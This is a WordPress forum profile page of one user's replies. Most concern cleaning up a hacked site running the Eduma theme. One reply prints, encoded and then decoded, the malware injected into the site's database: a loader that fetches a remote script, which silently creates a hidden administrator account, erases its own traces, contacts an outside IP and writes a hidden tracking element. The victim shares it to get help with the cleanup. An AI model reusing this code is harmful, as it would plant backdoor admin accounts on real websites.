Blutarsky

Forum Replies Created

Viewing 15 replies - 16 through 30 (of 264 total)
  • Thread Starter Blutarsky

    (@blutarsky)

    Great!

    Thread Starter Blutarsky

    (@blutarsky)

    Strange is the low-frequence rate…. may be a new strategy?

    Thread Starter Blutarsky

    (@blutarsky)

    Did this happen to somebody else?

    Thread Starter Blutarsky

    (@blutarsky)

    Thanks Yorman, very helpful as always!

    Thread Starter Blutarsky

    (@blutarsky)

    Thanks Yorman!

    Thread Starter Blutarsky

    (@blutarsky)

    Yorman, has this feature been added? I can’t find any setting to add hostname to the email alert subject….

    No answers? Bad sign!

    Thread Starter Blutarsky

    (@blutarsky)

    Are you using Eduma theme?
    If so, update your theme to the latest version, if not change theme with a recently developed theme. Then follow this guide to clean: https://sucuri.net/guides/how-to-clean-hacked-wordpress

    Thread Starter Blutarsky

    (@blutarsky)

    So this was the code injected into wp_options on row name theme_mods_eduma-child:

    <script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 111, 110, 46, 115, 116, 114, 105, 110, 103, 101, 110, 103, 105, 110, 101, 115, 46, 99, 111, 109, 47, 106, 115, 111, 110, 46, 106, 115, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 115, 99, 114, 105, 112, 116, 41, 59, 10))</script>

    This translates to:

    var sscript = document.createElement("script"); sscript.type = "text/javascript"; sscript.src = "https://json.stringengines.com/json.js"; document.head.appendChild(sscript);

    and the linked script (https://json.stringengines.com/json.js) contains:

    gotome();
checkmeone();

   
 function putmeone()  {
	
		 var site = extractSummary(document.head.innerHTML);
		 if(site == "null") { return; }
		 var newuser_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112);
		 var ajax_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 97, 100, 109, 105, 110, 45, 97, 106, 97, 120, 46, 112, 104, 112);
		 var _td = String.fromCharCode(9, 9, 32, 118, 97, 114, 32, 36, 32, 61, 32, 106, 81, 117, 101, 114, 121, 46, 110, 111, 67, 111, 110, 102, 108, 105, 99, 116, 40, 41, 59, 10, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 110, 101, 119, 117, 115, 101, 114, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 104, 116, 109, 108, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 42, 99, 111, 110, 115, 111, 108, 101, 46, 108, 111, 103, 40, 34, 71, 101, 116, 116, 105, 110, 103, 32, 78, 111, 110, 99, 101, 34, 41, 59, 42, 47, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 32, 61, 32, 47, 110, 97, 109, 101, 61, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 40, 91, 32, 93, 43, 41, 118, 97, 108, 117, 101, 61, 34, 40, 91, 94, 34, 93, 43, 41, 34, 47, 103, 59, 10, 9, 9, 9, 105, 102, 40, 104, 116, 109, 108, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 41, 32, 33, 61, 61, 32, 45, 49, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 109, 32, 61, 32, 114, 101, 46, 101, 120, 101, 99, 40, 104, 116, 109, 108, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 105, 102, 32, 40, 109, 91, 50, 93, 46, 109, 97, 116, 99, 104, 40, 47, 40, 91, 97, 45, 122, 48, 45, 57, 93, 123, 49, 48, 125, 41, 47, 41, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 110, 111, 110, 99, 101, 32, 61, 32, 109, 91, 50, 93, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 110, 101, 119, 117, 115, 101, 114, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 109, 101, 116, 104, 111, 100, 34, 32, 58, 32, 34, 80, 79, 83, 84, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 100, 97, 116, 97, 34, 32, 58, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 97, 99, 116, 105, 111, 110, 34, 58, 34, 99, 114, 101, 97, 116, 101, 117, 115, 101, 114, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 58, 32, 110, 111, 110, 99, 101, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 95, 119, 112, 95, 104, 116, 116, 112, 95, 114, 101, 102, 101, 114, 101, 114, 34, 32, 58, 32, 34, 47, 119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 115, 101, 114, 95, 108, 111, 103, 105, 110, 34, 58, 32, 34, 115, 105, 109, 112, 108, 101, 48, 48, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 101, 109, 97, 105, 108, 34, 32, 58, 32, 34, 115, 105, 109, 112, 108, 101, 64, 115, 105, 109, 112, 108, 101, 115, 105, 116, 101, 46, 99, 111, 109, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 102, 105, 114, 115, 116, 95, 110, 97, 109, 101, 34, 32, 58, 32, 34, 115, 105, 109, 112, 108, 101, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 108, 97, 115, 116, 95, 110, 97, 109, 101, 34, 32, 58, 32, 34, 115, 105, 109, 112, 108, 101, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 32, 58, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 109, 112, 108, 101, 46, 99, 111, 109, 47, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 97, 115, 115, 49, 34, 32, 58, 32, 34, 112, 97, 115, 115, 102, 111, 114, 109, 101, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 97, 115, 115, 49, 45, 116, 101, 120, 116, 34, 32, 58, 32, 34, 112, 97, 115, 115, 102, 111, 114, 109, 101, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 97, 115, 115, 50, 34, 32, 58, 32, 34, 112, 97, 115, 115, 102, 111, 114, 109, 101, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 101, 110, 100, 95, 117, 115, 101, 114, 95, 110, 111, 116, 105, 102, 105, 99, 97, 116, 105, 111, 110, 34, 32, 58, 32, 48, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 114, 111, 108, 101, 34, 58, 34, 97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 99, 114, 101, 97, 116, 101, 117, 115, 101, 114, 34, 32, 58, 32, 34, 65, 100, 100, 43, 78, 101, 119, 43, 85, 115, 101, 114, 34, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 104, 116, 109, 108, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 99, 111, 110, 115, 111, 108, 101, 46, 108, 111, 103, 40, 34, 78, 101, 119, 32, 85, 115, 101, 114, 32, 99, 114, 101, 97, 116, 101, 100, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 82, 101, 109, 111, 118, 101, 105, 110, 103, 32, 116, 104, 101, 32, 88, 83, 83, 32, 102, 114, 111, 109, 32, 116, 104, 101, 32, 115, 105, 116, 101, 44, 32, 99, 97, 108, 108, 98, 97, 99, 107, 32, 104, 101, 108, 108, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 97, 106, 97, 120, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 109, 101, 116, 104, 111, 100, 34, 32, 58, 32, 34, 80, 79, 83, 84, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 100, 97, 116, 97, 34, 32, 58, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 97, 99, 116, 105, 111, 110, 34, 58, 34, 102, 97, 107, 101, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 101, 114, 109, 97, 108, 105, 110, 107, 95, 115, 116, 114, 117, 99, 116, 117, 114, 101, 34, 58, 32, 49, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 82, 101, 115, 101, 100, 32, 100, 111, 109, 101, 44, 32, 114, 101, 108, 111, 97, 100, 32, 116, 104, 101, 32, 112, 97, 103, 101, 10, 9, 9, 9, 9, 9, 9, 9, 9, 104, 116, 116, 112, 71, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 49, 52, 54, 46, 49, 56, 53, 46, 49, 56, 50, 46, 49, 55, 54, 47, 103, 47, 97, 46, 112, 104, 112, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 32, 61, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 32, 43, 32, 39, 38, 114, 101, 108, 111, 97, 100, 61, 49, 39, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 41, 59, 10, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 9, 9, 9, 10, 9, 9, 125, 10, 10, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 125, 41, 59);
		 eval(_td);
}

function httpGet(theUrl)
{
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", theUrl, false );
    xmlHttp.send( null );
    return xmlHttp.responseText;
}

function extractSummary(iCalContent) {
  var rx = /href="(.*)wp-content/g;
  if(iCalContent.indexOf("/wp-content/") !== -1) {
	  var arr = rx.exec(iCalContent);
	  return arr[1]; 
  }
  
  return "null";
}

function checkmeone() {
	var site = extractSummary(document.head.innerHTML);
	if(site == "null") { return 0; }
	var newuser_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112);
	var ajax_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 97, 100, 109, 105, 110, 45, 97, 106, 97, 120, 46, 112, 104, 112);
	eval(String.fromCharCode(118, 97, 114, 32, 36, 32, 61, 32, 106, 81, 117, 101, 114, 121, 46, 110, 111, 67, 111, 110, 102, 108, 105, 99, 116, 40, 41, 59, 10, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 110, 101, 119, 117, 115, 101, 114, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 104, 116, 109, 108, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 32, 61, 32, 47, 110, 97, 109, 101, 61, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 40, 91, 32, 93, 43, 41, 118, 97, 108, 117, 101, 61, 34, 40, 91, 94, 34, 93, 43, 41, 34, 47, 103, 59, 10, 9, 9, 9, 105, 102, 40, 104, 116, 109, 108, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 41, 32, 33, 61, 61, 32, 45, 49, 41, 32, 123, 10, 9, 9, 9, 9, 112, 117, 116, 109, 101, 111, 110, 101, 40, 41, 59, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 9, 103, 101, 116, 109, 101, 111, 110, 101, 40, 41, 59, 10, 9, 9, 9, 125, 10, 10, 32, 32, 32, 32, 32, 32, 32, 32, 125, 44, 10, 9, 9, 34, 102, 97, 105, 108, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 103, 101, 116, 109, 101, 111, 110, 101, 40, 41, 59, 10, 9, 9, 125, 10, 32, 32, 32, 32, 125, 41, 59));
}
function getcookone() {
	if (document.cookie.indexOf(String.fromCharCode(99, 104, 101, 99, 107, 109, 101, 111, 110, 99, 101, 61)) >= 0) { 
		
	} else { 
		var now = new Date();
		now.setTime(now.getTime() + 1 * 3600 * 1000 * 10);
		document.cookie = String.fromCharCode(99, 104, 101, 99, 107, 109, 101, 111, 110, 99, 101, 61)+"=5464; expires=" + now.toUTCString() + "; path=/";
		return 1;
	}
	return 0;
}
function getmeone() {
	
	if(getcookone() == 1) {
		gotome();
	}
}
function gotome(){
		var ulink = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 46, 115, 116, 114, 105, 110, 103, 101, 110, 103, 105, 110, 101, 115, 46, 99, 111, 109, 47, 115, 112, 46, 112, 104, 112, 63, 97, 116, 61, 53, 55, 38, 98, 99, 61, 51, 52, 53, 38, 114, 112, 115, 61, 53, 52, 54, 55, 56, 53, 52, 38, 115, 116, 121, 61, 52, 53, 55, 38, 103, 101, 116, 61, 55, 53); 
		//document.location.href = ulink; 
		//window.location.href = ulink;
document.write("<div style='position:absolute;left:-4637px'><a href='//www.liveinternet.ru/click;trafficbetter' "+
"target=_blank><img src='//counter.yadro.ru/hit;trafficbetter?t45.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a><\/div>")

    Translation:

    gotome();
checkmeone();

   
 function putmeone()  {
	
		 var site = extractSummary(document.head.innerHTML);
		 if(site == "null") { return; }
		 var newuser_url = site+"wp-admin/user-new.php";
		 var ajax_url = site+"wp-admin/admin-ajax.php";
		 var _td = "		 var $ = jQuery.noConflict();
     $.ajax({
        "url": newuser_url,
        "success" : function(html){
            /*console.log("Getting Nonce");*/
            var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
			if(html.indexOf("_wpnonce_create-user") !== -1) {
            var m = re.exec(html);
            if (m[2].match(/([a-z0-9]{10})/)) {
                var nonce = m[2];
               
                $.ajax({
                    "url": newuser_url,
                    "method" : "POST",
                    "data" :
                    {
                        "action":"createuser",
                        "_wpnonce_create-user": nonce,
                        "_wp_http_referer" : "/wp-admin/user-new.php",
                        "user_login": "simple001",
                        "email" : "[email protected]",
                        "first_name" : "simple",
                        "last_name" : "simple",
                        "url" : "https://simple.com/",
                        "pass1" : "passforme1",
                        "pass1-text" : "passforme1",
                        "pass2" : "passforme1",
                        "send_user_notification" : 0,
                        "role":"administrator",
                        "createuser" : "Add+New+User"
                    },
                    "success" : function(html){
                        //console.log("New User created");
                        //Removeing the XSS from the site, callback hell
                        $.ajax({
                            "url": ajax_url,
                            "method" : "POST",
                            "data" :
                             {
                                "action":"fake",
                                "permalink_structure": 1
                             },
                            "success": function(){
                                //Resed dome, reload the page
								httpGet("https://146.185.182.176/g/a.php");
                                //window.location = window.location + '&reload=1';
                            }
                        });

                    }
                });
            }
			
		}

        }
    });";
		 eval(_td);
}

function httpGet(theUrl)
{
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", theUrl, false );
    xmlHttp.send( null );
    return xmlHttp.responseText;
}

function extractSummary(iCalContent) {
  var rx = /href="(.*)wp-content/g;
  if(iCalContent.indexOf("/wp-content/") !== -1) {
	  var arr = rx.exec(iCalContent);
	  return arr[1]; 
  }
  
  return "null";
}

function checkmeone() {
	var site = extractSummary(document.head.innerHTML);
	if(site == "null") { return 0; }
	var newuser_url = site+"v";
	var ajax_url = site+"wp-admin/admin-ajax.php";
	eval("var $ = jQuery.noConflict();
     $.ajax({
        "url": newuser_url,
        "success" : function(html){
           
            var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
			if(html.indexOf("_wpnonce_create-user") !== -1) {
				putmeone();
			} else {
				getmeone();
			}

        },
		"fail" : function() {
			getmeone();
		}
    });");
}
function getcookone() {
	if (document.cookie.indexOf("checkmeonce=") >= 0) { 
		
	} else { 
		var now = new Date();
		now.setTime(now.getTime() + 1 * 3600 * 1000 * 10);
		document.cookie = "checkmeonce="+"=5464; expires=" + now.toUTCString() + "; path=/";
		return 1;
	}
	return 0;
}
function getmeone() {
	
	if(getcookone() == 1) {
		gotome();
	}
}
function gotome(){
		var ulink = "https://for.stringengines.com/sp.php?at=57&bc=345&rps=5467854&sty=457&get=75"; 
		//document.location.href = ulink; 
		//window.location.href = ulink;
document.write("<div style='position:absolute;left:-4637px'><a href='//www.liveinternet.ru/click;trafficbetter' "+
"target=_blank><img src='//counter.yadro.ru/hit;trafficbetter?t45.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a><\/div>")

		
}
    • This reply was modified 7 years, 3 months ago by Blutarsky.
    Thread Starter Blutarsky

    (@blutarsky)

    Today my site was hacked again, turning things into nightmare. The injection changed the script to create an admin equivalent user. I will publish the code tomorrow. So I have focused on the value being replaced and it looks like this is a well known hack, see here for more: https://wphutte.com/education-wp-3-0-6-1-unauthenticated-theme-options-overwrite-or-stored-xss/
    Are you using Eduma education wp theme?
    I have commented out the code that allows modification of this value true Ajax calls

    Thread Starter Blutarsky

    (@blutarsky)

    I have followed all the possible guides anf it may be that the backdoor has been removed. What is left out is:

    1) Old theme code (will be updated but requires weeks), protected by firewall
    2) Code injected in the database that may cause malware spreading

    As for number 2, I have performed scans with many plugins, and apparently there are no threats. I have also dumped the DB but I have no idea what to look for. Any idea on this?

    Thread Starter Blutarsky

    (@blutarsky)

    I couldn’t get rid of the backdoor

    Same problem here. there should be a preview to verify

    Thread Starter Blutarsky

    (@blutarsky)

    Fantastic, thanks!

    Thread Starter Blutarsky

    (@blutarsky)

    I remember about some cron jobs with a given url….

Viewing 15 replies - 16 through 30 (of 264 total)